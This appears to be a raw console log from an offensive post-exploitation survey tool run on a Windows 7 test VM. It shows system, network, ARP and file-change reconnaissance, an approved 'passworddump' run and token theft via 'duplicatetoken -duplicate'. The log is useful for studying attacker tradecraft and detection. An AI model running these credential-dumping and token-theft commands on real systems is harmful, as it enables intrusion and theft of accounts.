- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\InstallPlayReady |
- | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate $(Arg0) (runs in "") | | | NETWORK SERVICE LEAST | Media Center\mcupdate |
- | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -MediaCenterRecoveryTask (runs in "") | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
- | SERVICE | COM job ClassID and data: {23E5D772-327A-42F5-BDEE-C65C6796BB2A} - $(Arg1) | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
- | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -ObjectStoreRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
- | SERVICE | COM job ClassID and data: {177AFECE-9599-46CF-90D7-68EC9EEB27B4} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURActivate (runs in "") | | | SYSTEM LEAST | Media Center\OCURActivate |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\OCURDiscovery |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscovery |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW1 |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW2 |
- | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
- | SERVICE | COM job ClassID and data: {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
- | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrSchedule (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
- | SERVICE | COM job ClassID and data: {CEF51277-5358-477B-858C-4E14F0C80BF7} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\RegisterSearch |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoReindexSearchRoot (runs in "") | | | SYSTEM LEAST | Media Center\ReindexSearchRoot |
- | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -SqlLiteRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
- | SERVICE | COM job ClassID and data: {59116E30-02BD-4B84-BA1E-5D77E809B1A2} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
- | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\UpdateRecordPath |
- | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - PageNotZero | EVENT | EVENT | LEAST | MemoryDiagnostic\CorruptionDetector |
- | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - Decompression | EVENT | EVENT | LEAST | MemoryDiagnostic\DecompressionFailureDetector |
- | SERVICE | COM job ClassID and data: {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - | LOGON | LOGON | LEAST | MobilePC\HotStart |
- | SERVICE | %%%%windir%%%%\system32\lpremove.exe (runs in "") | BOOT | BOOT | SYSTEM HIGHEST | MUI\LPRemove |
- | SERVICE | COM job ClassID and data: {2DEA658F-54C1-4227-AF9B-260AB5FC3543} - | LOGON | LOGON | LEAST | Multimedia\SystemSoundsService |
- | SERVICE | %%%%windir%%%%\system32\gatherNetworkInfo.vbs (runs in "$(Arg1)") | | | HIGHEST | NetTrace\GatherNetworkInfo |
- | SERVICE | %%%%SystemRoot%%%%\System32\powercfg.exe -energy -auto (runs in "") | DAILY 2008-01-01T06:00:00 | DAILY 2008-01-01T06:00:00 | SYSTEM LEAST | Power Efficiency Diagnostics\AnalyzeSystem |
- | SERVICE | COM job ClassID and data: {42060D27-CA53-41F5-96E4-B1E8169308A6} - $(Arg0) | EVENT , TIME 2008-03-31T00:00:00Z | EVENT , TIME 2008-03-31T00:00:00Z | LOCAL SERVICE LEAST | RAC\RacTask |
- | SERVICE | COM job ClassID and data: {C463A0FC-794F-4FDF-9201-01938CEACAFA} - | EVENT | EVENT | LOCAL SERVICE LEAST | Ras\MobilityManager |
- | SERVICE | COM job ClassID and data: {CA767AA8-9157-4604-B64B-40747123D5F2} - | DAILY 2008-01-01T00:00:00 | DAILY 2008-01-01T00:00:00 | SYSTEM LEAST | Registry\RegIdleBackup |
- | SERVICE | %%%%windir%%%%\system32\RAServer.exe /offerraupdate (runs in "%%%%windir%%%%") | EVENT , REGISTRATION | EVENT , REGISTRATION | SYSTEM HIGHEST | RemoteAssistance\RemoteAssistanceTask |
- | SERVICE | COM job ClassID and data: {FF87090D-4A9A-4F47-879B-29A80C355D61} - $(Arg0) | LOGON | LOGON | LEAST | SideShow\GadgetManager |
- | SERVICE | COM job ClassID and data: {855FEC53-D2E4-4999-9E87-3414E9CF0FF4} - $(Arg0) | | | LEAST | Task Manager\Interactive |
- | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (runs in "") | EVENT | EVENT | HIGHEST | Tcpip\IpAddressConflict1 |
- | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (runs in "") | EVENT 2006-02-23T16:27:43 | EVENT 2006-02-23T16:27:43 | HIGHEST | Tcpip\IpAddressConflict2 |
- | SERVICE | COM job ClassID and data: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} - | LOGON | LOGON | LEAST | TextServicesFramework\MsCtfMonitor |
- | SERVICE | %%%%windir%%%%\system32\sc.exe start w32time task_started (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | LOCAL SERVICE HIGHEST | Time Synchronization\SynchronizeTime |
- | SERVICE | sc.exe config upnphost start= auto (runs in "") | | | SYSTEM LEAST | UPnP\UPnPHostConfig |
- | SERVICE | COM job ClassID and data: {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1} - | | | HIGHEST | WDI\ResolutionHost |
- | SERVICE | %%%%SystemRoot%%%%\system32\Wat\WatAdminSvc.exe /run (runs in "") | DAILY 2017-07-24T21:30:29Z | DAILY 2017-07-24T21:30:29Z | LOCAL SERVICE LEAST | Windows Activation Technologies\ValidationTask |
- | SERVICE | %%%%SystemRoot%%%%\system32\schtasks.exe /run /I /TN "\Microsoft\Windows\Windows Activation Technologies\ValidationTask" (runs in "") | DAILY 2017-08-03T21:30:29Z | DAILY 2017-08-03T21:30:29Z | LOCAL SERVICE LEAST | Windows Activation Technologies\ValidationTaskDeadline |
- | SERVICE | %%%%windir%%%%\system32\wermgr.exe -queuereporting (runs in "") | LOGON | LOGON | LEAST | Windows Error Reporting\QueueReporting |
- | SERVICE | %%%%windir%%%%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange (runs in "") | EVENT | EVENT | SYSTEM LEAST | Windows Filtering Platform\BfeOnServiceStartTypeChange |
- | SERVICE | "%%%%ProgramFiles%%%%\Windows Media Player\wmpnscfg.exe" (runs in "") | EVENT | EVENT | LEAST | Windows Media Sharing\UpdateLibrary |
- | SERVICE | %%%%systemroot%%%%\System32\sdclt.exe /CONFIGNOTIFICATION (runs in "") | DAILY 2013-10-30T10:00:00 | DAILY 2013-10-30T10:00:00 | LOCAL SERVICE LEAST | WindowsBackup\ConfigNotification |
- | SERVICE | COM job ClassID and data: {0358B920-0AC7-461F-98F4-58E32CD89148} - | LOGON | LOGON | LEAST | Wininet\CacheTask |
- | SERVICE | c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (runs in "") | DAILY 2000-01-01T04:40:02 2100-01-01T00:00:00 | DAILY 2000-01-01T04:40:02 2100-01-01T00:00:00 | SYSTEM HIGHEST | Windows Defender\MP Scheduled Scan |
- - [2017-04-28 09:49:57 z0.0.0.11] =============================== Persistence checks ===============================================================
- - | Path/Key | File/Value | Data |
- - +------------------------------------------------------------+---------------+------------------------------------------+
- - | system\currentcontrolset\Services\tcpip\Parameters\Winsock | HelperDllName | %%%%SystemRoot%%%%\System32\wshtcpip.dll |
- - | Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_Dlls | |
- - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Shell | explorer.exe |
- - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Userinit | C:\Windows\system32\userinit.exe, |
- - | Software\Microsoft\Windows\CurrentVersion\Run | VBoxTray | C:\Windows\system32\VBoxTray.exe |
- - [2017-04-28 09:50:08 z0.0.0.11] Saved safety handlers for future op(s)
- - [2017-04-28 09:50:09 z0.0.0.11] ================================== Password dump ==================================================================
- - [2017-04-28 09:50:09 z0.0.0.11] 1 safety handler registered for passworddump
- I think it's safe to run passworddump. Do you want to run it?
- YES
- - [2017-04-28 09:50:23 z0.0.0.11] ================================= OS information =================================================================
- - [2017-04-28 09:50:26 z0.0.0.11] Data age: 02 seconds - data is fresh
- - OS installed on Wed Oct 23 09:22:44 2013
- - System language settings
- Locale: English (USA)
- Installed: English (USA)
- UI: English (USA)
- OS: English (USA)
- - System version information
- Version: 6.1.1.0 Build 7601 winnt i386 Service Pack 1
- - [2017-04-28 09:50:27 z0.0.0.11] ============================= Networking Information =============================================================
- FQDN: IE11Win7
- DNS Servers: 192.168.1.1
- - [2017-04-28 09:50:27 z0.0.0.11] Showing all non-local and non-tunnel encapsulation adapter information, see command 222 for full interface list
- | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
- +--------------------------------------+-------------------+--------------+---------------+---------------------------------+-------------+------------------------------------------------------------------+
- | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-61-EB-58 | 192.168.1.58 | 255.255.255.0 | fe80::267f:20ff:fecc:26ba%%%%13 | 192.168.1.1 | Local Area Connection 2 ({A2692622-D935-45DD-BC6A-0FEA4F88524C}) |
- - ------------------------------------------------------------------- Route table -------------------------------------------------------------------
- - [2017-04-28 09:50:28 z0.0.0.11] Data age: 01 seconds - data is fresh
- | Dest. network | Mask | Gateway | Interface | Metric | Origin |
- +----------------------------------------+-----------------+---------------------------+--------------+--------+-----------+
- | 0.0.0.0 | 0.0.0.0 | 192.168.1.1 | 192.168.1.58 | 10 | MANUAL |
- | 127.0.0.0 | 255.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
- | 127.0.0.1 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
- | 127.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
- | 192.168.1.0 | 255.255.255.0 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
- | 192.168.1.58 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
- | 192.168.1.255 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
- | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | WELLKNOWN |
- | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 192.168.1.58 | 266 | WELLKNOWN |
- | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
- | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
- | :: | 0 | fe80::267f:20ff:fecc:26ba | 192.168.1.58 | 266 | ROUTER_AD |
- | ::1 | 128 | :: | 127.0.0.1 | 306 | MANUAL |
- | 2001:: | 32 | :: | | 8 | ROUTER_AD |
- | 2001:0:9d38:953c:18fa:3db4:3f57:fec5 | 128 | :: | | 256 | MANUAL |
- | 2600:6c55:4000:1bb:: | 64 | :: | 192.168.1.58 | 18 | ROUTER_AD |
- | 2600:6c55:4000:1bb:64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
- | 2600:6c55:4000:1bb:c1a6:e4f8:1108:9c72 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
- | 2600:6c55:4080:3b:: | 64 | :: | 192.168.1.58 | 18 | ROUTER_AD |
- | 2600:6c55:4080:3b:64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
- | 2600:6c55:4080:3b:c1a6:e4f8:1108:9c72 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
- | fe80:: | 64 | :: | 192.168.1.58 | 266 | MANUAL |
- | fe80:: | 64 | :: | | 256 | MANUAL |
- | fe80::5efe:c0a8:13a | 128 | :: | | 256 | MANUAL |
- | fe80::18fa:3db4:3f57:fec5 | 128 | :: | | 256 | MANUAL |
- | fe80::64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
- | ff00:: | 8 | :: | 127.0.0.1 | 306 | WELLKNOWN |
- | ff00:: | 8 | :: | | 256 | WELLKNOWN |
- | ff00:: | 8 | :: | 192.168.1.58 | 266 | WELLKNOWN |
- - -------------------------------------------------------------------- ARP table --------------------------------------------------------------------
- - [2017-04-28 09:50:30 z0.0.0.11] Data age: 01 seconds - data is fresh
- | IP | Type | Interface | MAC |
- +---------------------------+------+--------------+-------------------------------------------+
- | 224.0.0.22 | | 127.0.0.1 | |
- | 239.255.255.250 | | 127.0.0.1 | |
- | 192.168.1.1 | | 192.168.1.58 | 24-7F-20-CC-26-BA |
- | 192.168.1.3 | | 192.168.1.58 | BC-85-56-D3-56-BB |
- | 192.168.1.255 | | 192.168.1.58 | FF-FF-FF-FF-FF-FF |
- | 224.0.0.22 | | 192.168.1.58 | 01-00-5E-00-00-16 |
- | 224.0.0.252 | | 192.168.1.58 | 01-00-5E-00-00-FC |
- | 239.255.255.250 | | 192.168.1.58 | 01-00-5E-7F-FF-FA |
- | 255.255.255.255 | | 192.168.1.58 | FF-FF-FF-FF-FF-FF |
- | ff02::c | | 127.0.0.1 | |
- | ff02::16 | | 127.0.0.1 | |
- | ff02::1:2 | | 127.0.0.1 | |
- | ff02::2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
- | ff02::16 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
- | fe80::267f:20ff:fecc:26ba | | 192.168.1.58 | 24-7F-20-CC-26-BA |
- | fe80::e185:cac2:2cba:6d90 | | 192.168.1.58 | BC-85-56-D3-56-BB |
- | ff02::1 | | 192.168.1.58 | 33-33-00-00-00-01 |
- | ff02::2 | | 192.168.1.58 | 33-33-00-00-00-02 |
- | ff02::c | | 192.168.1.58 | 33-33-00-00-00-0C |
- | ff02::16 | | 192.168.1.58 | 33-33-00-00-00-16 |
- | ff02::1:2 | | 192.168.1.58 | 33-33-00-01-00-02 |
- | ff02::1:3 | | 192.168.1.58 | 33-33-00-01-00-03 |
- | ff02::1:ff08:9c72 | | 192.168.1.58 | 33-33-FF-08-9C-72 |
- | ff02::1:ff4b:26f3 | | 192.168.1.58 | 33-33-FF-4B-26-F3 |
- | ff02::1:ffba:6d90 | | 192.168.1.58 | 33-33-FF-BA-6D-90 |
- | ff02::1:ffcc:26ba | | 192.168.1.58 | 33-33-FF-CC-26-BA |
- - ----------------------------------------------------- Getting the pipelist in the background -----------------------------------------------------
- - --------------------------------------------------------------------- NETBIOS ---------------------------------------------------------------------
- Running command 'netbios '
- ---------------------------------------------------------------------
- IE11WIN7 UNIQUE REGISTERED Workstation Service
- WORKGROUP GROUP REGISTERED Domain Name
- IE11WIN7 UNIQUE REGISTERED File Server Service
- WORKGROUP GROUP REGISTERED Browser Service Elections
- Adapter Address: 08.00.27.61.eb.58
- Adapter Type : Ethernet Adapter
- Command completed successfully
- Do you want to run background netmap -minimal?
- YES
- - Netmap will require user credentials (and probably won't work on 2K8)
- - If you want to run netmap, you have to go run "duplicatetoken -duplicate" or logonasuser for me
- Do you want to do this?
- YES
- Please enter the user handle you were given by duplicatetoken or logonasuser I should use (i.e. proc1234)
- IEUser
- - [2017-04-28 09:51:49 z0.0.0.11] 1 safety handler registered for netmap
- - [2017-04-28 09:51:51 z0.0.0.11] ============================ Memory usage information ============================================================
- - [2017-04-28 09:51:51 z0.0.0.11] 1 safety handler registered for memory
- - [2017-04-28 09:51:52 z0.0.0.11] Data age: 01 seconds - data is fresh
- - Memory Load : 35%%
- - Physical Available: 659 M
- - Physical Total : 1023 M
- - [2017-04-28 09:51:53 z0.0.0.11] ============================ Disk list and space info ============================================================
- - [2017-04-28 09:51:56 z0.0.0.11] Data age: 01 seconds - data is fresh
- | Drive | Serial | Type | In use (MB) | Change (MB) |
- +-------+-----------+-------+-------------------+-------------+
- | C | e0ce-337d | Fixed | 9859/129943 (7%%) | 0 |
- - [2017-04-28 09:51:57 z0.0.0.11] ================================= USB survey info =================================================================
- - [2017-04-28 09:51:58 z0.0.0.11] System\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} data is only 0:00:01.259000 old, was not re-run
- - [2017-04-28 09:51:59 z0.0.0.11] SYSTEM\CurrentControlSet\Enum\USB data is only 0:00:01.094000 old, was not re-run
- - [2017-04-28 09:52:00 z0.0.0.11] SYSTEM\CurrentControlSet\Enum\USBSTOR not found
- - [2017-04-28 09:52:00 z0.0.0.11] Showing recent USB devices
- [2017-04-28 16:32:32] ##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&394c0ad3&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- [2014-11-26 19:47:05] ##?#IDE#DiskVirtual_HD______________________________1.1.0___#5&35dc7040&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- [2009-07-14 04:52:51] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&17b13437&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
- - [2017-04-28 09:52:03 z0.0.0.11] User info started in the background as command ID 506.
- - [2017-04-28 09:52:03 z0.0.0.11] Extra info to get started in the background as command ID 509.
- Running command 'python diffhour.py -args "-safe -sysdrive -recursive"'
- - [2017-04-28 09:52:05 z0.0.0.11] Recording initial data, running "dir -mask "*" -path C: -age 1h -recursive"
- - [2017-04-28 09:52:05 z0.0.0.11] Running dir -path C: -after "2017-04-28 15:52:06" -mask "*" -recursive -before "2017-04-28 16:52:06"
- | Modtime | Size | Path | Name |
- +---------------------+------------+-----------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------+
- | 2017-04-28 16:32:51 | 1073741824 | C:\ | pagefile.sys |
- | 2017-04-28 16:40:08 | <DIR> | C:\ProgramData\Microsoft\RAC | Temp |
- | 2017-04-28 16:42:08 | 282624 | C:\ProgramData\Microsoft\RAC\PublishedData | RacWmiDatabase.sdf |
- | 2017-04-28 16:42:08 | 544768 | C:\ProgramData\Microsoft\RAC\StateData | RacDatabase.sdf |
- | 2017-04-28 16:42:08 | 8 | C:\ProgramData\Microsoft\RAC\StateData | RacMetaData.dat |
- | 2017-04-28 16:42:08 | 16412 | C:\ProgramData\Microsoft\RAC\StateData | RacWmiDataBookmarks.dat |
- | 2017-04-28 16:42:08 | 163868 | C:\ProgramData\Microsoft\RAC\StateData | RacWmiEventData.dat |
- | 2017-04-28 16:33:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications | Windows |
- | 2017-04-28 16:33:36 | 8192 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | MSS.chk |
- | 2017-04-28 16:33:36 | 1048576 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | MSS.log |
- | 2017-04-28 16:33:36 | 8454144 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | tmp.edb |
- | 2017-04-28 16:33:36 | 42008576 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | Windows.edb |
- | 2017-04-28 16:33:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs | SystemIndex |
- | 2017-04-28 16:33:36 | 0 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex | SystemIndex.8.Crwl |
- | 2017-04-28 16:33:36 | 0 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex | SystemIndex.8.gthr |
- | 2017-04-28 16:36:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer | CiFiles |
- | 2017-04-28 16:36:36 | 8192 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.ci |
- | 2017-04-28 16:36:36 | 4096 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.dir |
- | 2017-04-28 16:36:36 | 65536 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.wid |
- | 2017-04-28 16:33:45 | 135168 | C:\ProgramData\Microsoft\Windows\DRM | drmstore.hds |
- | 2017-04-28 16:35:23 | 0 | C:\ProgramData\Microsoft\Windows Defender | IMpService925A3ACA-C353-458A-AC8D-A7E5EB378092.lock |
- | 2017-04-28 16:36:15 | 237282 | C:\ProgramData\Microsoft\Windows Defender\Support | MPLog-07132009-215552.log |
- | 2017-04-28 16:46:02 | 786432 | C:\Users\IEUser | NTUSER.DAT |
- | 2017-04-28 16:46:02 | 262144 | C:\Users\IEUser | ntuser.dat.LOG1 |
- | 2017-04-28 16:33:48 | <DIR> | C:\Users\IEUser\AppData\Local | Temp |
- | 2017-04-28 16:46:07 | 524288 | C:\Users\IEUser\AppData\Local\Microsoft\Windows | UsrClass.dat |
- | 2017-04-28 16:46:07 | 246784 | C:\Users\IEUser\AppData\Local\Microsoft\Windows | UsrClass.dat.LOG1 |
- | 2017-04-28 16:35:34 | <DIR> | C:\Users\IEUser\AppData\Local\Microsoft\Windows\WER | ERC |
- | 2017-04-28 16:33:48 | 3622686 | C:\Users\IEUser\AppData\Local\Temp | BGInfo.bmp |
- | 2017-04-28 16:33:34 | <DIR> | C:\Users\IEUser\AppData\Local\Temp | WPDNSE |
- | 2017-04-28 16:32:57 | 67584 | C:\Windows | bootstat.dat |
- | 2017-04-28 16:37:20 | <DIR> | C:\Windows | inf |
- | 2017-04-28 16:33:00 | 2323 | C:\Windows | setupact.log |
- | 2017-04-28 16:37:20 | <DIR> | C:\Windows | System32 |
- | 2017-04-28 16:36:14 | <DIR> | C:\Windows | Temp |
- | 2017-04-28 16:32:56 | 0 | C:\Windows\debug | PASSWD.LOG |
- | 2017-04-28 16:33:25 | 36272 | C:\Windows\debug | wlms.log |
- | 2017-04-28 16:37:20 | <DIR> | C:\Windows\inf | WmiApRpl |
- | 2017-04-28 16:37:20 | <DIR> | C:\Windows\inf\WmiApRpl | 0009 |
- | 2017-04-28 16:37:15 | 3444 | C:\Windows\inf\WmiApRpl | WmiApRpl.h |
- | 2017-04-28 16:37:20 | 28590 | C:\Windows\inf\WmiApRpl\0009 | WmiApRpl.ini |
- | 2017-04-28 16:35:19 | <DIR> | C:\Windows\Microsoft.NET\Framework | v4.0.30319 |
- | 2017-04-28 16:45:32 | 262144 | C:\Windows\ServiceProfiles\LocalService | NTUSER.DAT |
- | 2017-04-28 16:45:32 | 226304 | C:\Windows\ServiceProfiles\LocalService | NTUSER.DAT.LOG1 |
- | 2017-04-28 16:33:18 | <DIR> | C:\Windows\ServiceProfiles\LocalService\AppData | Local |
- | 2017-04-28 16:32:59 | 0 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | lastalive0.dat |
- | 2017-04-28 16:32:59 | 0 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | lastalive1.dat |
- | 2017-04-28 16:33:00 | 16777216 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | ~FontCache-FontFace.dat |
- | 2017-04-28 16:33:18 | 319424 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | ~FontCache-System.dat |
- | 2017-04-28 16:45:37 | 262144 | C:\Windows\ServiceProfiles\NetworkService | NTUSER.DAT |
- | 2017-04-28 16:45:37 | 226304 | C:\Windows\ServiceProfiles\NetworkService | NTUSER.DAT.LOG1 |
- | 2017-04-28 16:33:47 | <DIR> | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0 | Icon Files |
- | 2017-04-28 16:33:47 | 5022 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files | fa2fa449-604c-4e69-8c5a-6baa8cee5d09.png |
- | 2017-04-28 16:40:18 | 578879488 | C:\Windows\SoftwareDistribution\DataStore | DataStore.edb |
- | 2017-04-28 16:35:22 | <DIR> | C:\Windows\SoftwareDistribution\DataStore | Logs |
- | 2017-04-28 16:40:18 | 8192 | C:\Windows\SoftwareDistribution\DataStore\Logs | edb.chk |
- | 2017-04-28 16:40:18 | 1310720 | C:\Windows\SoftwareDistribution\DataStore\Logs | edb.log |
- | 2017-04-28 16:37:20 | 106316 | C:\Windows\System32 | perfc009.dat |
- | 2017-04-28 16:37:20 | 623940 | C:\Windows\System32 | perfh009.dat |
- | 2017-04-28 16:37:20 | 726316 | C:\Windows\System32 | PerfStringBackup.INI |
- | 2017-04-28 16:33:39 | 8192 | C:\Windows\System32\catroot2 | edb.chk |
- | 2017-04-28 16:33:39 | 65536 | C:\Windows\System32\catroot2 | edb.log |
- | 2017-04-28 16:33:39 | 1056768 | C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE} | catdb |
- | 2017-04-28 16:33:40 | 20193280 | C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} | catdb |
- | 2017-04-28 16:45:42 | 262144 | C:\Windows\System32\config | DEFAULT |
- | 2017-04-28 16:45:42 | 156672 | C:\Windows\System32\config | DEFAULT.LOG1 |
- | 2017-04-28 16:33:18 | 262144 | C:\Windows\System32\config | SAM |
- | 2017-04-28 16:33:17 | 21504 | C:\Windows\System32\config | SAM.LOG1 |
- | 2017-04-28 16:45:52 | 262144 | C:\Windows\System32\config | SECURITY |
- | 2017-04-28 16:45:52 | 21504 | C:\Windows\System32\config | SECURITY.LOG1 |
- | 2017-04-28 16:46:42 | 35389440 | C:\Windows\System32\config | SOFTWARE |
- | 2017-04-28 16:46:42 | 262144 | C:\Windows\System32\config | SOFTWARE.LOG1 |
- | 2017-04-28 16:47:39 | 11010048 | C:\Windows\System32\config | SYSTEM |
- | 2017-04-28 16:47:39 | 262144 | C:\Windows\System32\config | SYSTEM.LOG1 |
- | 2017-04-28 16:40:20 | <DIR> | C:\Windows\System32\LogFiles | Scm |
- | 2017-04-28 16:33:06 | 20 | C:\Windows\System32\LogFiles\Scm | 1ec9510d-a439-4950-9399-b6399edf9ea7 |
- | 2017-04-28 16:33:07 | 20 | C:\Windows\System32\LogFiles\Scm | 2c59ecaf-3a27-4640-9f4b-519b05bdd70f |
- | 2017-04-28 16:40:07 | 12 | C:\Windows\System32\LogFiles\Scm | 5b184694-64c3-4633-94c5-945b3fa561d6 |
- | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | 93e98122-6bf3-4fdc-aeca-74fad5c96233 |
- | 2017-04-28 16:33:20 | 12 | C:\Windows\System32\LogFiles\Scm | 9b75c702-ea13-406a-badb-6c588ee4375b |
- | 2017-04-28 16:40:07 | 12 | C:\Windows\System32\LogFiles\Scm | a1cfa52f-06f2-418d-addb-cd6456d66f43 |
- | 2017-04-28 16:40:09 | 12 | C:\Windows\System32\LogFiles\Scm | a6394592-54ce-4e93-8d64-1a068f462632 |
- | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | bba67ad0-4ba0-4b44-827b-ff419b70c057 |
- | 2017-04-28 16:46:22 | 12 | C:\Windows\System32\LogFiles\Scm | de8699d2-8a05-42f7-8a85-5162af47d26a |
- | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | de8bae53-2809-4f75-85ef-427d364b9b2c |
- | 2017-04-28 16:40:20 | 20 | C:\Windows\System32\LogFiles\Scm | def25c67-2829-4507-8c40-4111ae376e45 |
- | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | ea4f6189-e102-41e6-8fbb-5c10fc54a023 |
- | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | f1369a11-e983-4458-b390-712efa1cba44 |
- | 2017-04-28 16:33:12 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTDiagLog.etl |
- | 2017-04-28 16:32:45 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventLog-Application.etl |
- | 2017-04-28 16:33:03 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventlog-Security.etl |
